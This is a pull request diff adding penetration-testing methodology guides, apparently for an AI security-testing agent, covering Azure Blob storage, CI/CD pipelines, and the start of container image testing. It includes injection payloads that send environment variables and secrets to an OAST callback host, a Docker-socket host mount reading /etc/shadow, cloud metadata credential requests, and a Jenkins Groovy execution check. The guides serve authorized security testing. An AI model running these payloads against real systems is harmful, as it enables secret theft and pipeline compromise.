### PR TITLE
feat(skills): cloud asset methodology skills

### DIFF
--- a/strix/skills/cloud/azure_blob.md
+++ b/strix/skills/cloud/azure_blob.md
@@ -1,0 +1,180 @@
+---
+name: azure_blob
+description: Azure Blob/Storage testing - container access levels, SAS exposure, public blobs, anonymous enumeration, and credential pivots
+---
+
+# Azure Blob / Storage Testing
+
+Azure Blob Storage exposes data over predictable HTTPS endpoints (`https://<account>.blob.core.windows.net/<container>/<blob>`). Given a storage account name, container, blob URL, or a leaked SAS token, the objective is to assess the effective access level: whether containers allow anonymous read/list, whether a SAS grants more than intended (write/delete/account-wide), and whether storage data or keys can be pivoted into Azure control-plane access. Anonymous public access on a single container is the most common real finding; over-scoped SAS tokens and leaked account keys are the highest impact. For SSRF-mediated access to Azure IMDS/MSI, see the ssrf skill.
+
+## Attack Surface
+
+**Endpoints (per account, all share the account name)**
+- Blob: `https://<account>.blob.core.windows.net/`
+- File: `https://<account>.file.core.windows.net/`
+- Queue: `https://<account>.queue.core.windows.net/`
+- Table: `https://<account>.table.core.windows.net/`
+- Static website: `https://<account>.z<NN>.web.core.windows.net/`
+- Data Lake Gen2 (HNS): `https://<account>.dfs.core.windows.net/`
+- Sovereign/gov clouds: `.blob.core.usgovcloudapi.net`, `.blob.core.chinacloudapi.cn`
+
+**Access levels (container `publicAccess`)**
+- `private` (None): no anonymous access; auth required
+- `blob`: anonymous read of a blob if the exact name is known, but no listing
+- `container`: anonymous read AND list of all blobs (worst case)
+
+**Authorization material**
+- SAS tokens in URLs (`?sv=...&sig=...`): service, account, or user-delegation SAS
+- Storage account keys (`key1`/`key2`, base64, ~88 chars)
+- Connection strings (`DefaultEndpointsProtocol=https;AccountName=...;AccountKey=...`)
+- Microsoft Entra (Azure AD) RBAC tokens (`Storage Blob Data Reader/Contributor`)
+
+**Where exposure leaks in**
+- Hardcoded SAS/keys/connection strings in JS bundles, mobile apps, git history, CI logs
+- CDN origins (`*.azureedge.net`) fronting a public container
+- CORS-enabled containers consumed by SPAs (account name in network tab)
+
+## Recon & Enumeration
+
+Install Azure tooling and storage-focused enumerators if absent:
+```
+# Azure CLI
+curl -sL https://aka.ms/InstallAzureCLIDeb | bash
+# AzureHound / cloud audit
+pipx install scoutsuite
+git clone https://github.com/NetSPI/MicroBurst.git    # PowerShell, account name brute force
+git clone https://github.com/initstring/cloud_enum.git && pip install -r cloud_enum/requirements.txt
+```
+
+Discover account/container names from a target:
+```
+# Pull JS and config for endpoints, SAS, connection strings
+katana -u https://target.tld -d 3 -jc -o katana.txt
+grep -ahoE 'https://[a-z0-9]{3,24}\.(blob|file|queue|table|dfs|z[0-9]+\.web)\.core\.windows\.net[^"'\'' ]*' katana.txt | sort -u
+trufflehog filesystem ./repo --only-verified            # finds AccountKey / SAS in source
+gitleaks detect --source ./repo --redact
+# Multi-cloud name permutation (Azure blob/file/queue/table + public access check)
+python3 cloud_enum/cloud_enum.py -k targetname -k target-prod -k targetcdn --quickscan
+```
+
+Confirm endpoints resolve and probe at HTTP layer:
+```
+echo "https://acct.blob.core.windows.net" | httpx -title -status-code -tech-detect -server
+nuclei -u https://acct.blob.core.windows.net -tags azure,exposure -severity medium,high,critical -j -o nuclei_azure.jsonl
+```
+
+Anonymous list/read against a known container (no creds, REST API):
+```
+# List blobs in a container (works only if publicAccess=container)
+curl -s "https://acct.blob.core.windows.net/CONTAINER?restype=container&comp=list" | xmllint --format -
+# Read a specific blob (works if publicAccess=blob or container)
+curl -s -o out.bin "https://acct.blob.core.windows.net/CONTAINER/path/to/blob"
+# Account-level container list is NOT anonymous; requires SAS/key
+```
+
+Brute-force container names against an account (anonymous):
+```
+ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt \
+  -u "https://acct.blob.core.windows.net/FUZZ?restype=container&comp=list" \
+  -mc 200,403 -t 40 -o containers.json
+# 200 = listable (publicAccess=container); 403 = exists but private/blob-level; 404 = no such container
+```
+
+If you hold a SAS or key, drive the full surface with `az`:
+```
+az storage container list --account-name acct --sas-token "?sv=..." -o table
+az storage blob list -c CONTAINER --account-name acct --sas-token "?sv=..." -o table
+az storage blob list -c CONTAINER --connection-string "DefaultEndpointsProtocol=...;AccountKey=..." -o table
+```
+
+## Methodology
+
+1. **Collect identifiers** - account name(s), container names, full blob URLs, and any SAS/keys/connection strings from JS, mobile bundles, git history, CI logs, and CDN configs.
+2. **Resolve endpoints** - confirm each `<account>.<service>.core.windows.net` resolves (CNAME via `dnsx`) and which services (blob/file/queue/table/dfs/web) are active.
+3. **Classify container access** - for each known container, test `restype=container&comp=list`: 200 = `container` (list+read), 403 with valid blob read = `blob`, 403/404 = private. Never assume; verify per container.
+4. **Enumerate listable content** - parse the XML blob list; flag backups (`.bak`, `.sql`, `.zip`, `.tar.gz`), configs (`web.config`, `.env`, `appsettings.json`), keys, terraform state, and DB dumps.
+5. **Assess every SAS** - decode the query params to read exact permissions, scope, and expiry. Test what the SAS actually allows vs. its intended use.
+6. **Test write/delete where the SAS or access level permits** - upload a benign canary blob (authorized scope only) to prove write; never overwrite real data.
+7. **Pivot keys to control plane** - if an account key or connection string is found, enumerate all containers, check for Data Lake ACLs, and test whether the key principal maps to broader Azure RBAC.
+8. **Check downstream wiring** - static website hosting, CORS `*`, CDN origin trust, Event Grid/Function triggers fired by blob upload.
+
+## Key Weaknesses / Techniques
+
+### Public container (anonymous list + read)
+The default-deny was overridden to `container`. Anyone can enumerate and download everything.
+```
+curl -s "https://acct.blob.core.windows.net/backups?restype=container&comp=list&maxresults=5000" \
+  | grep -oE '<Name>[^<]+' | sed 's/<Name>//'
+# Recursively pull listed blobs
+for b in $(curl -s "https://acct.blob.core.windows.net/backups?restype=container&comp=list" | grep -oE '<Name>[^<]+' | sed 's/<Name>//'); do
+  curl -s -o "dl/$(basename "$b")" "https://acct.blob.core.windows.net/backups/$b"; done
+```
+
+### Public blob (read without list)
+`publicAccess=blob`: listing 403s, but any guessed/leaked blob name is readable. Combine with name leaks from JS, sitemaps, or predictable paths (`/avatars/<userid>.png`, `/invoices/<seq>.pdf`) to harvest objects via IDOR-style enumeration.
+
+### Over-scoped or stale SAS
+Decode and judge the token. Key fields: `sp` (permissions: `r`/`w`/`d`/`l`/`a`/`c`/`u`/`p`), `sr` (resource: `b`=blob, `c`=container), `srt`+`ss` (account SAS scope), `se` (expiry), `sip` (IP restriction), `spr` (protocol), `sig` (HMAC).
+```
+# Split the query string into readable params
+python3 -c "import urllib.parse,sys; [print(k,'=',v) for k,v in urllib.parse.parse_qsl(sys.argv[1].lstrip('?'))]" "?sv=2022-11-02&ss=bfqt&srt=sco&sp=rwdlacupx&se=2030-01-01T00:00:00Z&sig=..."
+```
+Red flags: `sp` includes `w`/`d`/`c`/`a` (write/delete/create); `srt=sco` + `ss=bfqt` (account SAS over all services); `se` far in the future or already expired but still honored; no `sip`; `spr=https,http`.
+
+### Leaked account key / connection string
+Account keys are god-mode for the storage account: full read/write/delete on every container, queue, table, file share, plus ability to mint new SAS tokens. Validate scope (read-only proof) with `az storage container list`.
+
+### Public access not blocked at account level
+If `allowBlobPublicAccess=true` at the account, any container can be flipped public by anyone with `Storage Account Contributor`. Note in findings even when no container is currently public.
+
+### Static website / `$web` and CDN origin
+`$web` serves files at `<account>.z<NN>.web.core.windows.net`. Check the underlying container for over-broad upload rights and for `azureedge.net` CDNs that cache and re-serve a (now private) origin's stale public objects.
+
+### Data Lake Gen2 POSIX ACLs
+On HNS accounts (`.dfs.core.windows.net`), RBAC may say private while a permissive ACL (`other: r-x`) still allows access. Test the `dfs` endpoint separately from `blob`.
+
+## Validation
+
+1. **Public list**: show a `200` XML `EnumerationResults` from `?restype=container&comp=list` with the source IP being the sandbox, not a browser. Capture 1-2 blob names as proof.
+2. **Public/leaked read**: download a single non-sensitive object and record its `Content-Length`, `ETag`, and `Last-Modified` from response headers.
+3. **SAS write proof (authorized scope only)**: upload a tiny canary, then delete it.
+```
+curl -s -X PUT -H "x-ms-blob-type: BlockBlob" -H "Content-Length: 11" \
+  --data-binary "auth-check" "https://acct.blob.core.windows.net/CONTAINER/_authz_check.txt?<SAS>"
+# Confirm, then clean up
+curl -s -X DELETE "https://acct.blob.core.windows.net/CONTAINER/_authz_check.txt?<SAS>"
+```
+4. **Key scope**: `az storage container list --account-name acct --account-key <KEY> -o table` listing containers proves account-key validity. Stop at read-level proof.
+5. Record exact account, container, access level, SAS permission string, and expiry in the finding.
+
+## False Positives
+
+- `403 AuthenticationFailed`/`ResourceNotFound` on `comp=list` means the container is private or blob-level, not public. Do not report list-403 as a finding.
+- A readable blob whose container is `blob`-level is working as designed if the content is genuinely meant to be public (CDN assets, public site media). Judge by content sensitivity, not reachability.
+- OAST/callback "hits" sourced from the tester's own browser rather than a server confirm nothing about the storage account.
+- An expired SAS that returns `403 Signature... expired` is not exploitable.
+- `sig` mismatch (`AuthenticationFailed`) on a truncated/copied token means the SAS is invalid, not that access was granted.
+- `404` for a brute-forced container name only means the name does not exist.
+- Public static-website assets in `$web` are intentional; flag only writable origins or stale-cached private data.
+
+## Chaining & Impact
+
+- Public/listable container -> backups, DB dumps, terraform state -> hardcoded creds -> broader environment compromise.
+- Leaked `.env`/`appsettings.json` in a blob -> app/DB credentials, API keys, additional connection strings -> lateral movement.
+- Account key or `srt=sco/ss=bfqt` account SAS -> full storage takeover; mint long-lived SAS for persistence; read every container/table/queue.
+- Writable container behind a static site or app deployment slot -> overwrite JS/HTML -> stored XSS or supply-chain code execution for site visitors.
+- Writable container that triggers an Event Grid -> Azure Function -> deserialization/command path in the consumer.
+- Terraform state (`*.tfstate`) in a public container -> plaintext secrets, resource IDs, and the storage RBAC graph for further pivots.
+- Storage creds -> Azure Resource Manager only if the principal also holds management-plane RBAC; storage keys alone do not grant ARM access.
+
+## Pro Tips
+
+1. The account name is global and guessable - brute force `targetname`, `target-prod`, `targetbackup`, `targetcdn`, `targetdev` permutations; account names are 3-24 lowercase alphanumerics.
+2. Always test `comp=list` AND a direct blob GET separately - they map to two different access levels (`container` vs `blob`).
+3. Decode every SAS before using it; the `sp` and `srt`/`ss` fields tell you the blast radius instantly, and an account SAS (`srt=sco`) is far worse than a single-blob service SAS.
+4. SAS tokens cannot be revoked individually unless tied to a stored access policy - a long-`se` token in old JS is often still live; check `se` against today's date.
+5. Snapshots and versions persist deleted data: append `?comp=list&include=snapshots,versions,deleted` when you have list rights.
+6. Check all four services per account - data hides in `table`/`queue`/`file`, not just `blob`; the `dfs` endpoint can differ from `blob` due to POSIX ACLs.
+7. `x-ms-version` header changes behavior; if an API rejects a request, retry with a recent version like `2022-11-02`.
+8. Grep JS bundles for `core.windows.net`, `?sv=`, `AccountKey=`, and `BlobEndpoint=` - the account name in a SPA's network tab is the start of the whole assessment.
+9. Use `cloud_enum` for fast public/private classification across blob/file/queue/table in one pass before manual digging.

--- a/strix/skills/cloud/cicd_pipeline.md
+++ b/strix/skills/cloud/cicd_pipeline.md
@@ -1,0 +1,221 @@
+---
+name: cicd_pipeline
+description: CI/CD pipeline security testing - pipeline injection, secret exposure, artifact integrity, runner escape, and supply chain compromise
+---
+
+# CI/CD Pipeline Security Testing
+
+A CI/CD pipeline is the automated build/test/deploy machinery (GitHub Actions, GitLab CI, Jenkins, CircleCI, Azure Pipelines, Buildkite, Drone, Tekton, Argo) that turns source commits into deployable artifacts and pushes them to production. It is high-value because it sits between untrusted code and trusted infrastructure: it holds cloud credentials, registry push rights, signing keys, and deploy access, and it executes attacker-influenceable inputs (branch names, PR titles, commit messages, dependency manifests) with those privileges. The attacker objective is to execute code in the pipeline context, exfiltrate secrets/tokens, or tamper with build artifacts so the malicious output is signed, published, and deployed as if it were trusted.
+
+## Attack Surface
+
+**Scope**
+- Pipeline definition files: `.github/workflows/*.yml`, `.gitlab-ci.yml`, `Jenkinsfile`, `.circleci/config.yml`, `azure-pipelines.yml`, `bitbucket-pipelines.yml`, `.drone.yml`, `cloudbuild.yaml`, Tekton/Argo `PipelineRun` CRDs
+- Build runners/agents (ephemeral or persistent VMs, self-hosted runners, Docker-in-Docker, Kubernetes executors)
+- Secret stores wired into jobs (GitHub/GitLab CI variables, Vault, AWS/GCP/Azure secret managers, OIDC federation)
+- Artifact registries and caches (GHCR, Docker Hub, ECR/GAR/ACR, Artifactory/Nexus, npm/PyPI/Maven, GitHub artifact/cache storage)
+- Webhooks, deploy keys, bot accounts, and the SCM API the pipeline authenticates to
+
+**Attacker-controlled entry points**
+- Pull/merge requests from forks that trigger workflows (`pull_request_target`, `workflow_run`, GitLab `merge_request` pipelines)
+- Branch names, tag names, PR titles/bodies, commit messages, issue comments interpolated into shell
+- Dependency manifests (`package.json`, `requirements.txt`, `pom.xml`, Dockerfile `FROM`) and lockfiles
+- Reusable/3rd-party actions, shared libraries, container base images, and pipeline includes (`include:`, `extends:`)
+- Self-hosted runner registration tokens and the runner's local network position
+
+**Exposed assets when compromised**
+- Long-lived cloud keys, registry push tokens, code-signing/Sigstore keys, kubeconfigs, SSH deploy keys
+- The default SCM token (`GITHUB_TOKEN`, `CI_JOB_TOKEN`) and its repo/org write scope
+- Internal network reachable from the runner (metadata endpoints, internal registries, k8s API)
+
+## Recon & Enumeration
+
+Most recon is repository-driven. Clone with full history first, then inspect pipeline config, secret handling, and trigger logic.
+
+```
+# Clone target with full history (deleted secrets live in old commits)
+git clone <repo> /tmp/t && cd /tmp/t
+
+# Locate every pipeline definition and runner config
+find . -regextype posix-extended -regex \
+  '.*/(\.github/workflows/.*\.ya?ml|\.gitlab-ci\.yml|Jenkinsfile|\.circleci/config\.yml|azure-pipelines\.yml|bitbucket-pipelines\.yml|\.drone\.yml|cloudbuild\.ya?ml)'
+
+# Secret scanning across full history (run both - they catch different things)
+trufflehog git file:///tmp/t --only-verified --json
+gitleaks detect --source /tmp/t --report-format json --report-path /tmp/gitleaks.json --log-opts="--all"
+
+# Static analysis of pipeline definitions for injection sinks and misconfig
+semgrep --config p/ci --config p/secrets --config p/github-actions /tmp/t
+
+# Scan committed images / IaC / dependency manifests for CVEs + secrets
+trivy fs --scanners vuln,secret,misconfig /tmp/t
+trivy config /tmp/t   # Dockerfile / k8s / terraform misconfig
+```
+
+Externally exposed CI control planes (self-hosted Jenkins, GitLab, Drone, Argo, Buildkite agents):
+
+```
+naabu -host ci.target.tld -p 80,443,8080,8443,5000,2375,9000,50000 -silent | httpx -silent -title -tech-detect
+nmap -sV -p 8080,50000,443 ci.target.tld          # Jenkins web=8080, JNLP agent=50000
+nuclei -u https://jenkins.target.tld -tags jenkins,exposure,misconfig -s critical,high,medium -silent
+nuclei -u https://gitlab.target.tld -tags gitlab,cve -s critical,high -silent
+httpx -u https://jenkins.target.tld/script -status-code   # unauth Groovy console
+httpx -u https://jenkins.target.tld/whoAmI/api/json       # auth/anon identity leak
+ffuf -u https://ci.target.tld/FUZZ -w /usr/share/seclists/Discovery/Web-Content/jenkins.txt -mc 200,401,403
+```
+
+SCM/API-side enumeration with the platform CLI (use authorized tokens only):
+
+```
+# GitHub: list org secrets, runners, workflows, OIDC trust
+gh api /repos/{owner}/{repo}/actions/secrets
+gh api /repos/{owner}/{repo}/actions/runners        # self-hosted runners (escape targets)
+gh api /orgs/{org}/actions/permissions
+# GitLab: project CI variables, protected status, runner registration
+glab variable list -R group/project
+curl -s --header "PRIVATE-TOKEN: $TOKEN" https://gitlab.target.tld/api/v4/projects/<id>/variables
+```
+
+Asset-specific tools to install if missing:
+```
+# OIDC / cloud creds reachable from a runner
+pipx install awscli || pip install awscli ; curl https://sdk.cloud.google.com | bash   # gcloud
+# Software bill of materials + vuln match on built artifacts
+which syft grype || (curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh | sh -s -- -b /usr/local/bin && \
+  curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b /usr/local/bin)
+# Supply-chain posture: actionlint for GitHub Actions, zizmor for workflow audits
+go install github.com/rhysd/actionlint/cmd/actionlint@latest
+pipx install zizmor    # GitHub Actions security audit (injection, pwn requests, artifact poisoning)
+# OAST callbacks from inside the runner
+interactsh-client -v
+```
+
+## Methodology
+
+1. **Inventory the pipeline.** Identify platform, every workflow/job, trigger events, runner type (hosted vs self-hosted), and which jobs touch secrets, registries, or deploy targets.
+2. **Map trust boundaries.** For each workflow determine: who can trigger it (fork PRs? comments? tags?), what privileges the trigger grants (read vs write token, secret access), and whether untrusted code runs before or after the privileged step. This is the single most important step.
+3. **Trace attacker input into sinks.** Follow branch/tag/PR/commit/issue fields and dependency manifests into `run:`/`script:`/`sh` blocks, `${{ }}` interpolation, template expansions, and `eval`-like constructs.
+4. **Enumerate secrets and their scope.** List CI variables, OIDC trust policies, and what each credential can do (registry push, cloud admin, k8s deploy). Check masking/protection flags.
+5. **Assess the runner.** Determine isolation (ephemeral vs reused), Docker/k8s socket exposure, network reachability to metadata/internal services, and whether a fork PR can land on a self-hosted runner.
+6. **Assess artifact integrity.** Check how artifacts are built, whether dependencies and base images are pinned by digest, whether artifacts are signed/attested, and whether the publish step can be reached by untrusted code.
+7. **Build a PoC in a scoped branch/fork.** Demonstrate command execution, secret echo to OAST, or artifact tampering with a benign marker - never exfiltrate real production credentials to confirm.
+8. **Trace escalation.** Show how the foothold (token/secret/runner) reaches production: registry push -> deploy, cloud creds -> account access, SCM token -> protected branch.
+
+## Key Weaknesses / Techniques
+
+### Pipeline / command injection
+Untrusted fields interpolated directly into a shell. In GitHub Actions, `${{ github.event.* }}` is expanded by the runner *before* the shell sees it, so quoting does not protect you.
+
+```yaml
+# VULNERABLE - PR title flows straight into bash
+- run: echo "Building PR: ${{ github.event.pull_request.title }}"
+```
+PoC title that runs commands: `a"; curl https://<id>.oast.fun/$(env|base64 -w0); echo "`
+Other tainted fields: `github.head_ref`, `github.event.issue.title`, `github.event.comment.body`, `github.event.pull_request.body`, branch/tag names. GitLab equivalent: `$CI_COMMIT_BRANCH`, `$CI_MERGE_REQUEST_TITLE` in `script:`. Detect with `zizmor` / `actionlint` and:
+```
+semgrep --config p/github-actions /tmp/t
+grep -rnE '\$\{\{\s*github\.(event|head_ref)' .github/workflows/
+```
+
+### Poisoned-pipeline / `pull_request_target` abuse
+`pull_request_target` and `workflow_run` run with the *base* repo's write token and secrets, but if the workflow checks out PR head code and runs it (build, test, lint, custom action), fork attackers get code execution with full privileges.
+```yaml
+# VULNERABLE - privileged trigger + checkout of untrusted PR head
+on: pull_request_target
+jobs: { build: { steps: [
+  { uses: actions/checkout@v4, with: { ref: "${{ github.event.pull_request.head.sha }}" } },
+  { run: npm install && npm test } ] } }   # postinstall/test scripts run with secrets
+```
+PoC: open a PR from a fork that adds a `postinstall` hook or modifies the test script to `printenv | curl -s --data-binary @- https://<id>.oast.fun/`. Confirm secrets appear in the OAST log.
+
+### Secret exposure
+- Secrets echoed/logged (masking only redacts exact matches; base64/reversed/split values leak: `echo $SECRET | base64`).
+- Secrets passed as build args or baked into image layers: `docker history --no-trunc <image>`; inspect layers with `dive` / `trivy image --scanners secret`.
+- Secrets in artifacts, caches, or env dumps uploaded with `actions/upload-artifact`.
+- `pull_request` (not `_target`) does NOT expose secrets to forks - verify which trigger is in use before claiming exposure.
+- Self-hosted runner reuse leaves prior jobs' secrets in `/tmp`, env, and Docker cache.
+```
+trufflehog filesystem ./artifacts --only-verified
+grep -rIE '(AKIA[0-9A-Z]{16}|ghp_[0-9A-Za-z]{36}|glpat-[0-9A-Za-z_-]{20}|eyJ[A-Za-z0-9_-]+\.eyJ)' ./artifacts
+trivy image --scanners secret <built-image>
+```
+
+### OIDC / cloud trust misconfiguration
+Pipelines federate to clouds via OIDC instead of static keys. Overly broad trust policies are the common flaw: an AWS role trusting `repo:org/*:*` or with no `sub` condition lets any repo/branch (including forks running attacker code) assume it.
+```
+# From a runner foothold, what cloud identity is reachable?
+curl -s "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazonaws.com" -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN"
+aws sts get-caller-identity
+aws iam list-attached-role-policies --role-name <assumed-role>
+# Inspect the trust policy for missing sub/branch conditions
+aws iam get-role --role-name <role> --query 'Role.AssumeRolePolicyDocument'
+```
+
+### Artifact / supply-chain integrity
+- Unpinned dependencies and actions (`uses: actions/checkout@main`, `FROM node:latest`) - a compromised upstream tag executes in your pipeline. Pin actions by full commit SHA, images by `@sha256:`.
+- Cache poisoning: a fork PR writes to a shared cache key that a privileged job later restores, injecting a malicious binary into the trusted build.
+- Dependency confusion: pipeline resolves an internal package name from a public registry; publish a higher-version public package to hijack the build.
+- No build provenance/signing: nothing prevents a tampered artifact from being published and deployed.
+```
+# Find unpinned actions and floating image tags
+grep -rnE 'uses:\s+[^@]+@(main|master|v?[0-9]+)\s*$' .github/workflows/
+grep -rniE '^\s*FROM\s+\S+:(latest|[0-9.]+)\s*$' . --include=Dockerfile
+# Generate SBOM + diff against published artifact to detect injected components
+syft <built-image> -o spdx-json > sbom.json ; grype sbom:sbom.json
+# Verify signing/attestation exists at all
+cosign verify <image> --certificate-identity-regexp '.*' --certificate-oidc-issuer-regexp '.*' 2>&1 | head
+```
+
+### Runner escape / privilege abuse
+- Docker socket mounted into jobs (`/var/run/docker.sock`) or DinD: spawn a privileged container, mount host FS.
+- Self-hosted runners on persistent hosts with network reach to internal services or metadata.
+- Jenkins unauth Groovy console (`/script`), `build-with-parameters` injection, or agent JNLP takeover.
+```
+ls -la /var/run/docker.sock && docker run -v /:/host --rm alpine cat /host/etc/shadow   # benign read PoC
+curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/   # metadata from runner
+# Jenkins unauth RCE check (authorized targets only)
+curl -s "https://jenkins.target.tld/script" --data-urlencode 'script=println "id".execute().text'
+```
+
+## Validation
+
+1. **Injection:** demonstrate execution of an attacker-controlled command via a tainted field with a benign payload that hits an `interactsh-client` OAST domain or writes a harmless marker file to the job artifacts. Capture the workflow run URL and the OAST interaction.
+2. **Secret exposure:** show the secret value (or a verifiable hash/last-4) reaching a destination it must not - the build log, an uploaded artifact, or an OAST callback. For OIDC, run `aws sts get-caller-identity` (or cloud equivalent) and show the assumed identity, then stop.
+3. **Artifact integrity:** rebuild or modify a dependency/cache in a scoped fork/branch and show the malicious marker appearing in the published artifact's SBOM (`syft`/`grype`) or image layers, proving untrusted input reaches the trusted output.
+4. **Runner escape:** read a host-only file (e.g. `/host/etc/hostname`) or reach an internal-only service from the runner; do not pivot further than needed to prove reachability.
+5. Always capture the run ID/URL, the exact trigger event, and the diff that introduced the PoC so the finding is reproducible.
+
+## False Positives
+
+- `pull_request` (not `pull_request_target`/`workflow_run`) running on fork PRs - by design it has a read-only token and NO secret access; injected code cannot reach secrets.
+- Secrets "in logs" that are actually masked (`***`) and never reconstructed via encoding tricks.
+- Unpinned action from `actions/*` or a verified-publisher org under organization allowlist + tag protection - lower risk than an arbitrary third-party action, note but don't overstate.
+- Static keys found by a scanner that are already rotated, fake/example, or scoped to a throwaway sandbox - verify with `trufflehog --only-verified`.
+- Self-hosted runner exposed but with ephemeral, single-job isolation and no fork-PR auto-run (requires maintainer approval) - the reuse/escape risk is mitigated.
+- Docker socket present but the executor is a per-job ephemeral microVM (gVisor/Firecracker/Kata) - host is still isolated.
+- OIDC role assumable but with a tight `sub` condition (`repo:org/repo:ref:refs/heads/main`) that forks/branches cannot satisfy.
+
+## Chaining & Impact
+
+- Fork PR injection -> dump `GITHUB_TOKEN`/CI job token -> push to protected branch or open a malicious release -> deploy.
+- Pipeline RCE -> read OIDC/cloud creds reachable from runner -> assume over-trusted role -> cloud account compromise (read secret manager, S3, deploy infra).
+- Cache/dependency poisoning -> malicious code lands in a signed, published artifact -> downstream consumers/production auto-pull it (classic software supply-chain compromise).
+- Registry push token exposure -> overwrite a `:latest` or mutable tag -> next deploy pulls the backdoored image.
+- Self-hosted runner foothold -> lateral movement into internal network / k8s API (see kubernetes skill) -> cluster compromise.
+- SCM token write scope -> modify the pipeline definition itself -> persistent backdoor that survives credential rotation.
+
+## Pro Tips
+
+1. The trigger event is everything: `pull_request_target` + `workflow_run` + checkout-of-head is the canonical critical bug. Grep for these triggers first.
+2. GitHub Actions expression injection happens at `${{ }}` expansion time, before the shell - quoting in the `run:` block does not help. The fix is passing tainted data via `env:` and referencing `"$VAR"`; flag configs that don't.
+3. Secret masking is exact-match only. Test exfil via `base64`, `rev`, `cut`, or printing one char per line - if it leaks past masking, it's a real finding.
+4. Always run `trufflehog`/`gitleaks` against the FULL git history (`--log-opts=--all`), not just `HEAD` - removed secrets stay in old commits and remain valid until rotated.
+5. Self-hosted runners that auto-run fork PRs are near-guaranteed RCE; check `runs-on:` labels and the runner approval policy before testing.
+6. OIDC has largely replaced static keys - shift focus to trust policy conditions (`sub`, `aud`, `repository`); a missing `sub` condition is the modern equivalent of a leaked root key.
+7. Use a private fork/scoped branch and benign OAST payloads for PoCs; never exfiltrate live production credentials to an external host to "prove" exposure.
+8. Pin everything by digest in your recommendations: actions by 40-char SHA, images by `@sha256:` - tag-based references are mutable and the root of most upstream-compromise chains.
+9. `zizmor` catches GitHub Actions issues (template injection, pwn-requests, artifact poisoning) that generic SAST misses - run it alongside `semgrep`/`actionlint`.
+
+## Summary
+
+CI/CD compromise is rarely one bug - it's a chain from an attacker-influenceable trigger, through code execution in a privileged context, to secret or artifact abuse that reaches production. Map the trust boundary for every workflow (who can trigger it and what that grants), trace tainted input into shell sinks, scope every credential's blast radius, and verify artifact integrity end to end. Prove findings with benign OAST payloads in a scoped branch, and stop at the minimum needed to demonstrate impact.

--- a/strix/skills/cloud/container_image.md
+++ b/strix/skills/cloud/container_image.md
@@ -1,0 +1,189 @@
+---
+name: container_image
+description: Docker/OCI registry and image security testing - layer secret mining, CVE triage, misconfigured entrypoints, and registry abuse
+---
+
+# Docker Registry / Image
+
+A container image is an addressable, layered filesystem (plus config/manifest JSON) served by an OCI/Docker registry. The asset identifier may be a registry endpoint (`registry.example.com`, `*.dkr.ecr.<region>.amazonaws.com`, GHCR, GCR/Artifact Registry, ACR, Harbor, Quay, a self-hosted `registry:2`) or a specific image reference (`repo/name:tag` or `@sha256:...`). The attacker objective is to pull or list images without authorization, then scan every layer for embedded secrets, exploitable CVEs in the base/runtime, and misconfigured entrypoints/run-as-root/capabilities that turn "I have the image" into credential theft, source disclosure, or remote code execution wherever that image runs. Layers are immutable and additive: a secret `rm`'d in a later layer still lives in the earlier layer's tarball.
+
+## Attack Surface
+
+**Registry API (v2)**
+- Registry HTTP API v2 at `/v2/` (200 or 401 with `WWW-Authenticate: Bearer` confirms a registry)
+- Catalog: `/v2/_catalog`, tags: `/v2/<repo>/tags/list`, manifests: `/v2/<repo>/manifests/<ref>`, blobs: `/v2/<repo>/blobs/<digest>`
+- Token/auth service (Bearer realm) — anonymous pulls often allowed even when push is gated
+- Common ports: 5000 (`registry:2`), 443/80 (hosted), 5001, 8080; Harbor/Quay/Nexus web UIs on 80/443/8081/8082
+
+**Image contents (per layer)**
+- Filesystem tarballs (`diff` layers), the image config JSON (env, entrypoint, cmd, user, labels), and the manifest
+- Build-time `ENV`/`ARG` leaked into config, `.dockerignore` misses, `COPY . .` of the whole repo (`.git/`, `.env`, keys)
+- Shell history, package caches, broken multi-stage builds that ship the builder stage
+
+**Surrounding ecosystem**
+- Dockerfiles, `docker-compose.yml`, CI workflows (`.github/workflows`, `.gitlab-ci.yml`) referencing registry creds
+- `~/.docker/config.json`, `~/.dockercfg`, k8s `imagePullSecrets`, cloud registry tokens (ECR/GCR/ACR)
+- Signing/attestation: cosign/Notary signatures, SBOM and provenance attestations (or their absence)
+
+## Recon & Enumeration
+
+Install the container toolchain (not preinstalled in the sandbox):
+```
+# trivy (CVE + secret + misconfig scanner)
+curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin
+# syft (SBOM) + grype (vuln match)
+curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh | sh -s -- -b /usr/local/bin
+curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b /usr/local/bin
+# skopeo (pull/inspect without a daemon), crane/regctl (registry surgery), dive (layer browser), cosign
+apt-get update && apt-get install -y skopeo
+GO111MODULE=on go install github.com/google/go-containerregistry/cmd/crane@latest
+go install github.com/regclient/regclient/cmd/regctl@latest
+curl -sSL https://github.com/wagoodman/dive/releases/latest/download/dive_linux_amd64.tar.gz | tar xz -C /usr/local/bin dive
+go install github.com/sigstore/cosign/v2/cmd/cosign@latest
+```
+
+Find and fingerprint registries:
+```
+naabu -host registry.example.com -p 5000,5001,443,80,8080,8081,8082 -silent
+httpx -l hosts.txt -path /v2/ -status-code -title -silent          # 200/401+Bearer = registry
+nuclei -u https://registry.example.com -tags docker,registry,exposure -s critical,high,medium -silent
+subfinder -d example.com -silent | httpx -path /v2/ -mc 200,401 -silent   # find registry.* / ghcr-style hosts
+```
+
+Enumerate repositories and tags over the v2 API (anonymous first):
+```
+curl -s https://registry.example.com/v2/_catalog | jq .                  # may be paginated: ?n=1000&last=<name>
+curl -s https://registry.example.com/v2/<repo>/tags/list | jq .
+# Hidden/undocumented repos when _catalog is disabled:
+ffuf -w repos.txt -u 'https://registry.example.com/v2/FUZZ/tags/list' -mc 200 -ac
+# Bearer-token flow (token scoped per-repo; anonymous scope often granted):
+TOKEN=$(curl -s "https://auth.example.com/token?service=registry.example.com&scope=repository:<repo>:pull" | jq -r .token)
+curl -s -H "Authorization: Bearer $TOKEN" https://registry.example.com/v2/<repo>/manifests/latest \
+  -H 'Accept: application/vnd.oci.image.index.v1+json'
+```
+
+Pull/inspect without running a daemon, then scan layers:
+```
